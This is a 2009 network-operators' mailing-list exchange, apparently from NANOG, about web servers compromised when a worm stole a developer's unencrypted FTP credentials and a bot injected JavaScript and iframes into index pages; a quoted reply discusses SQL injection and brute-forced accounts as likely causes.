RE: Malicious code just found on web server

["Chuck Schick" <chasjs () warp8 com>]

 We have seen this twice recently....we have tracked it back to a worm which
steals unencrypted ftp information from a desktop.  We tracked it down
because it occured on 7 or 8 sites that were on different servers both Linux
and Windows...some had no database associated with them.  The only common
thing on these sites was they all had the same web developer, she confirmed
she was using filezilla which does not encrypt the passwords she also
confirmed that she had found a virus/worm on her machine a few weeks before.
The same thing was found on other websites that she maintained that we did
not host.  FTP logs confirmed that a bot was making the changes through FTP.

The bot seems to inject a java script and IFrame in all pages that are named
index.*  - it changed HTML, php and asp extensions.

Chuck Schick
Warp 8, Inc.
(303)-421-5140
www.warp8.com   

-----Original Message-----
From: Mike Lewinski [mailto:mike () rockynet com] 
Sent: Monday, April 20, 2009 11:23 AM
To: nanog () nanog org
Subject: Re: Malicious code just found on web server


Paul Ferguson wrote:

> Most likely SQL injection. At any given time, there are hundreds of 
> thousands of "legitimate" websites out there that are unwittingly 
> harboring malicious code.

Most of the MS-SQL injection attacks we see write malicious javascript into
the DB itself so all query results include it. However, I'm not sure how
easy it is to leverage to get system access - we've seen a number of
compromised customer machines and there didn't appear to be any further
compromise of them beyond the obvious. In the OP's case it sounds like
static HTML files were altered. My bet is that an ftp or ssh account was
brute forced.

Mike